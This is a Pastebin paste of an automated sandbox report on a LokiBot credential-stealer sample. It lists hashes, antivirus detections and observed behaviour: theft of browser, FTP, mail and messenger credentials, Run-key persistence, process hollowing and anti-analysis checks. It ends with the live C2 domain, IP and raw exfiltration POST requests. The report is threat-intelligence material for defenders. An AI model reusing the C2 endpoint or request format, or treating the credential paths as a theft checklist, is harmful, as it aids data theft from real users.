Advertisement
paladin316

876Loki_53218df645651abc1fd66ad25e6e5b7e_1_2019-09-03_21_30.txt

Sep 3rd, 2019
1,382
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.13 KB | None | 0 0
  1.  
  2. * ID: 876
  3. * MalFamily: "Loki"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "Loki_53218df645651abc1fd66ad25e6e5b7e.1"
  8. * File Size: 933888
  9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  10. * SHA256: "b5c41c424f4ab9381877083a4cad0cfca4bff91994b3630ae1a179f0862689fd"
  11. * MD5: "53218df645651abc1fd66ad25e6e5b7e"
  12. * SHA1: "5fec40e80cc4b287e68af497ed577059b2bc0a32"
  13. * SHA512: "e5e42f9c73bbe373c7d066932a3ed4a9e1f6d0186cf6b03bad77b3dfa91ee1b2667076e12a2c9adc590123f72f81bddc060ff9fe528589c31e416d7b09664dab"
  14. * CRC32: "93BB5D79"
  15. * SSDEEP: "3072:3WynKrQ3vljF6lDZY3nf7IDTsQq1apZbQBQhNPvfqS2anFhDvfDkYhNv:bmQ3dF6ltcnfUPfq4pZbQB+SHUs"
  16.  
  17. * Process Execution:
  18. "9jFjh.exe",
  19. "wscript.exe",
  20. "filename.exe",
  21. "filename.exe",
  22. "explorer.exe",
  23. "services.exe",
  24. "lsass.exe",
  25. "taskhost.exe",
  26. "WmiApSrv.exe",
  27. "svchost.exe",
  28. "taskhost.exe",
  29. "svchost.exe",
  30. "WmiPrvSE.exe"
  31.  
  32.  
  33. * Executed Commands:
  34. "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\"",
  35. "C:\\Users\\user\\subfolder\\filename.vbs ",
  36. "\"C:\\Users\\user\\subfolder\\filename.exe\"",
  37. "C:\\Users\\user\\subfolder\\filename.exe ",
  38. "C:\\Windows\\system32\\lsass.exe",
  39. "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
  40. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  41. "taskhost.exe $(Arg0)"
  42.  
  43.  
  44. * Signatures Detected:
  45.  
  46. "Description": "Behavioural detection: Executable code extraction",
  47. "Details":
  48.  
  49.  
  50. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  51. "Details":
  52.  
  53.  
  54. "Description": "Possible date expiration check, exits too soon after checking local time",
  55. "Details":
  56.  
  57. "process": "9jFjh.exe, PID 2320"
  58.  
  59.  
  60.  
  61.  
  62. "Description": "Guard pages use detected - possible anti-debugging.",
  63. "Details":
  64.  
  65.  
  66. "Description": "Detected script timer window indicative of sleep style evasion",
  67. "Details":
  68.  
  69. "Window": "WSH-Timer"
  70.  
  71.  
  72.  
  73.  
  74. "Description": "A process attempted to delay the analysis task.",
  75. "Details":
  76.  
  77. "Process": "filename.exe tried to sleep 1264 seconds, actually delayed analysis time by 0 seconds"
  78.  
  79.  
  80.  
  81.  
  82. "Description": "Reads data out of its own binary image",
  83. "Details":
  84.  
  85. "self_read": "process: 9jFjh.exe, pid: 2320, offset: 0x00000000, length: 0x000e4000"
  86.  
  87.  
  88. "self_read": "process: wscript.exe, pid: 2124, offset: 0x00000000, length: 0x00000040"
  89.  
  90.  
  91. "self_read": "process: wscript.exe, pid: 2124, offset: 0x000000f0, length: 0x00000018"
  92.  
  93.  
  94. "self_read": "process: wscript.exe, pid: 2124, offset: 0x000001e8, length: 0x00000078"
  95.  
  96.  
  97. "self_read": "process: wscript.exe, pid: 2124, offset: 0x00018000, length: 0x00000020"
  98.  
  99.  
  100. "self_read": "process: wscript.exe, pid: 2124, offset: 0x00018058, length: 0x00000018"
  101.  
  102.  
  103. "self_read": "process: wscript.exe, pid: 2124, offset: 0x000181a8, length: 0x00000018"
  104.  
  105.  
  106. "self_read": "process: wscript.exe, pid: 2124, offset: 0x00018470, length: 0x00000010"
  107.  
  108.  
  109. "self_read": "process: wscript.exe, pid: 2124, offset: 0x00018640, length: 0x00000012"
  110.  
  111.  
  112.  
  113.  
  114. "Description": "A process created a hidden window",
  115. "Details":
  116.  
  117. "Process": "9jFjh.exe -> C:\\Users\\user\\subfolder\\filename.vbs"
  118.  
  119.  
  120. "Process": "9jFjh.exe -> C:\\Users\\user\\subfolder\\filename.exe"
  121.  
  122.  
  123.  
  124.  
  125. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  126. "Details":
  127.  
  128. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  129.  
  130.  
  131. "http_version_old": "HTTP traffic uses version 1.0"
  132.  
  133.  
  134. "suspicious_request_iocs": "http://zjvvymy.com/jp101/five/fre.php"
  135.  
  136.  
  137.  
  138.  
  139. "Description": "Performs some HTTP requests",
  140. "Details":
  141.  
  142. "url_iocs": "http://zjvvymy.com/jp101/five/fre.php"
  143.  
  144.  
  145.  
  146.  
  147. "Description": "A scripting utility was executed",
  148. "Details":
  149.  
  150. "command": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\""
  151.  
  152.  
  153.  
  154.  
  155. "Description": "Behavioural detection: Injection (Process Hollowing)",
  156. "Details":
  157.  
  158. "Injection": "filename.exe(2164) -> filename.exe(1136)"
  159.  
  160.  
  161.  
  162.  
  163. "Description": "Executed a process and injected code into it, probably while unpacking",
  164. "Details":
  165.  
  166. "Injection": "filename.exe(2164) -> filename.exe(1136)"
  167.  
  168.  
  169.  
  170.  
  171. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  172. "Details":
  173.  
  174. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 9274402 times"
  175.  
  176.  
  177.  
  178.  
  179. "Description": "Steals private information from local Internet browsers",
  180. "Details":
  181.  
  182. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  183.  
  184.  
  185.  
  186.  
  187. "Description": "Installs itself for autorun at Windows startup",
  188. "Details":
  189.  
  190. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name"
  191.  
  192.  
  193. "data": "C:\\Users\\user\\subfolder\\filename.vbs -Dirra"
  194.  
  195.  
  196.  
  197.  
  198. "Description": "Creates a hidden or system file",
  199. "Details":
  200.  
  201. "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  202.  
  203.  
  204. "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
  205.  
  206.  
  207.  
  208.  
  209. "Description": "CAPE detected the Loki malware family",
  210. "Details":
  211.  
  212.  
  213. "Description": "File has been identified by 21 Antiviruses on VirusTotal as malicious",
  214. "Details":
  215.  
  216. "MicroWorld-eScan": "Gen:Variant.Symmi.86341"
  217.  
  218.  
  219. "FireEye": "Generic.mg.53218df645651abc"
  220.  
  221.  
  222. "Malwarebytes": "Trojan.MalPack.VB.Generic"
  223.  
  224.  
  225. "Cybereason": "malicious.645651"
  226.  
  227.  
  228. "Arcabit": "Trojan.Symmi.D15145"
  229.  
  230.  
  231. "Symantec": "ML.Attribute.HighConfidence"
  232.  
  233.  
  234. "APEX": "Malicious"
  235.  
  236.  
  237. "BitDefender": "Gen:Variant.Symmi.86341"
  238.  
  239.  
  240. "Ad-Aware": "Gen:Variant.Symmi.86341"
  241.  
  242.  
  243. "Sophos": "Mal/FareitVB-N"
  244.  
  245.  
  246. "Invincea": "heuristic"
  247.  
  248.  
  249. "Emsisoft": "Gen:Variant.Symmi.86341 (B)"
  250.  
  251.  
  252. "Cyren": "W32/Wacatac.W.gen!Eldorado"
  253.  
  254.  
  255. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  256.  
  257.  
  258. "Endgame": "malicious (high confidence)"
  259.  
  260.  
  261. "GData": "Gen:Variant.Symmi.86341"
  262.  
  263.  
  264. "AhnLab-V3": "Trojan/Win32.Inject.R289841"
  265.  
  266.  
  267. "ALYac": "Gen:Variant.Symmi.86341"
  268.  
  269.  
  270. "MAX": "malware (ai score=82)"
  271.  
  272.  
  273. "ESET-NOD32": "a variant of Win32/Injector.EHOJ"
  274.  
  275.  
  276. "Fortinet": "W32/Injector.EHNM!tr"
  277.  
  278.  
  279.  
  280.  
  281. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  282. "Details":
  283.  
  284.  
  285. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  286. "Details":
  287.  
  288.  
  289. "Description": "Creates a copy of itself",
  290. "Details":
  291.  
  292. "copy": "C:\\Users\\user\\subfolder\\filename.exe"
  293.  
  294.  
  295. "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
  296.  
  297.  
  298.  
  299.  
  300. "Description": "Drops a binary and executes it",
  301. "Details":
  302.  
  303. "binary": "C:\\Users\\user\\subfolder\\filename.exe"
  304.  
  305.  
  306.  
  307.  
  308. "Description": "Harvests credentials from local FTP client softwares",
  309. "Details":
  310.  
  311. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
  312.  
  313.  
  314. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  315.  
  316.  
  317. "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
  318.  
  319.  
  320. "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
  321.  
  322.  
  323. "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
  324.  
  325.  
  326. "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
  327.  
  328.  
  329. "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
  330.  
  331.  
  332. "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
  333.  
  334.  
  335. "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
  336.  
  337.  
  338. "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
  339.  
  340.  
  341.  
  342.  
  343. "Description": "Harvests information related to installed instant messenger clients",
  344. "Details":
  345.  
  346. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  347.  
  348.  
  349.  
  350.  
  351. "Description": "Harvests information related to installed mail clients",
  352. "Details":
  353.  
  354. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  355.  
  356.  
  357. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
  358.  
  359.  
  360. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  361.  
  362.  
  363. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  364.  
  365.  
  366. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
  367.  
  368.  
  369. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
  370.  
  371.  
  372. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  373.  
  374.  
  375. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  376.  
  377.  
  378. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  379.  
  380.  
  381. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
  382.  
  383.  
  384. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
  385.  
  386.  
  387. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  388.  
  389.  
  390. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  391.  
  392.  
  393. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  394.  
  395.  
  396. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
  397.  
  398.  
  399. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  400.  
  401.  
  402. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
  403.  
  404.  
  405. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
  406.  
  407.  
  408. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
  409.  
  410.  
  411. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
  412.  
  413.  
  414. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  415.  
  416.  
  417. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  418.  
  419.  
  420. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  421.  
  422.  
  423. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  424.  
  425.  
  426. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
  427.  
  428.  
  429. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  430.  
  431.  
  432. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  433.  
  434.  
  435. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
  436.  
  437.  
  438. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
  439.  
  440.  
  441. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  442.  
  443.  
  444. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  445.  
  446.  
  447. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  448.  
  449.  
  450. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  451.  
  452.  
  453. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  454.  
  455.  
  456. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
  457.  
  458.  
  459.  
  460.  
  461. "Description": "Collects information to fingerprint the system",
  462. "Details":
  463.  
  464.  
  465. "Description": "Created network traffic indicative of malicious activity",
  466. "Details":
  467.  
  468. "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
  469.  
  470.  
  471. "signature": "ET TROJAN LokiBot Fake 404 Response"
  472.  
  473.  
  474. "signature": "ET TROJAN LokiBot Checkin"
  475.  
  476.  
  477. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
  478.  
  479.  
  480. "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
  481.  
  482.  
  483. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
  484.  
  485.  
  486. "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
  487.  
  488.  
  489.  
  490.  
  491.  
  492. * Started Service:
  493. "VaultSvc",
  494. "wmiApSrv"
  495.  
  496.  
  497. * Mutexes:
  498. "Local\\ZoneAttributeCacheCounterMutex",
  499. "Local\\ZonesCacheCounterMutex",
  500. "Local\\ZonesLockedCacheCounterMutex",
  501. "6EFA73A4746045B65DEE781E",
  502. "Global\\RefreshRA_Mutex_Lib",
  503. "Global\\RefreshRA_Mutex",
  504. "Global\\RefreshRA_Mutex_Flag",
  505. "Global\\WmiApSrv",
  506. "Global\\F659A567-8ACB-4E4A-92A7-5C2DD1884F72",
  507. "Global\\__?_c:_programdata_microsoft_rac_statedata_racdatabase.sdf",
  508. "Global\\__?_c:_programdata_microsoft_rac_statedata_racdatabase.sdf:x",
  509. "Global\\__?_c:_programdata_microsoft_rac_statedata_racdatabase.sdf:splk:2484",
  510. "Global\\3675fbff-ff22-403f-8962-09a68e2ba6a1:sqlce_se_lck:1",
  511. "Global\\3675fbff-ff22-403f-8962-09a68e2ba6a1:sqlce_se_lck:2"
  512.  
  513.  
  514. * Modified Files:
  515. "C:\\Users\\user\\subfolder\\filename.exe",
  516. "C:\\Users\\user\\subfolder\\filename.vbs",
  517. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  518. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe",
  519. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  520. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  521. "\\??\\WMIDataDevice",
  522. "\\??\\PIPE\\samr",
  523. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  524. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  525. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  526. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  527. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  528. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  529. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  530. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
  531. "C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat",
  532. "C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf"
  533.  
  534.  
  535. * Deleted Files:
  536. "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
  537. "C:\\Users\\user\\subfolder\\filename.exe"
  538.  
  539.  
  540. * Modified Registry Keys:
  541. "HKEY_CURRENT_USER\\Software\\VB and VBA Program Settings\\axhBo109\\bufEfgfSeEm77",
  542. "HKEY_CURRENT_USER\\Software\\VB and VBA Program Settings\\axhBo109\\bufEfgfSeEm77\\pE7Ok6f832",
  543. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  544. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  545. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr",
  546. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
  547. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name",
  548. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
  549. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  550. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
  551. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
  552. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
  553. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
  554. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  555. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  556. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  557. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  558. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  559. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  560. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  561. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
  562. "HKEY_CURRENT_USER\\Software\\Microsoft\\SQMClient\\Reliability\\AdaptiveSqm\\ManifestInfo\\Version"
  563.  
  564.  
  565. * Deleted Registry Keys:
  566. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  567. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  568. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  569. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
  570.  
  571.  
  572. * DNS Communications:
  573.  
  574. "type": "A",
  575. "request": "zjvvymy.com",
  576. "answers":
  577.  
  578. "data": "47.88.102.244",
  579. "type": "A"
  580.  
  581.  
  582.  
  583.  
  584.  
  585. * Domains:
  586.  
  587. "ip": "47.88.102.244",
  588. "domain": "zjvvymy.com"
  589.  
  590.  
  591.  
  592. * Network Communication - ICMP:
  593.  
  594. * Network Communication - HTTP:
  595.  
  596. "count": 2,
  597. "body": "",
  598. "uri": "http://zjvvymy.com/jp101/five/fre.php",
  599. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  600. "method": "POST",
  601. "host": "zjvvymy.com",
  602. "version": "1.0",
  603. "path": "/jp101/five/fre.php",
  604. "data": "POST /jp101/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: zjvvymy.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: BFD4E154\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
  605. "port": 80
  606.  
  607.  
  608. "count": 22,
  609. "body": "",
  610. "uri": "http://zjvvymy.com/jp101/five/fre.php",
  611. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  612. "method": "POST",
  613. "host": "zjvvymy.com",
  614. "version": "1.0",
  615. "path": "/jp101/five/fre.php",
  616. "data": "POST /jp101/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: zjvvymy.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: BFD4E154\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
  617. "port": 80
  618.  
  619.  
  620. "count": 1,
  621. "body": "\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00",
  622. "uri": "http://zjvvymy.com/jp101/five/fre.php",
  623. "user-agent": "Mozilla/4.08 (Charon; Inferno)",
  624. "method": "POST",
  625. "host": "zjvvymy.com",
  626. "version": "1.0",
  627. "path": "/jp101/five/fre.php",
  628. "data": "POST /jp101/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: zjvvymy.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: BFD4E154\r\nContent-Length: 149\r\nConnection: close\r\n\r\n\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00",
  629. "port": 80
  630.  
  631.  
  632.  
  633. * Network Communication - SMTP:
  634.  
  635. * Network Communication - Hosts:
  636.  
  637. "country_name": "United States",
  638. "ip": "47.88.102.244",
  639. "inaddrarpa": "",
  640. "hostname": "zjvvymy.com"
  641.  
  642.  
  643.  
  644. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement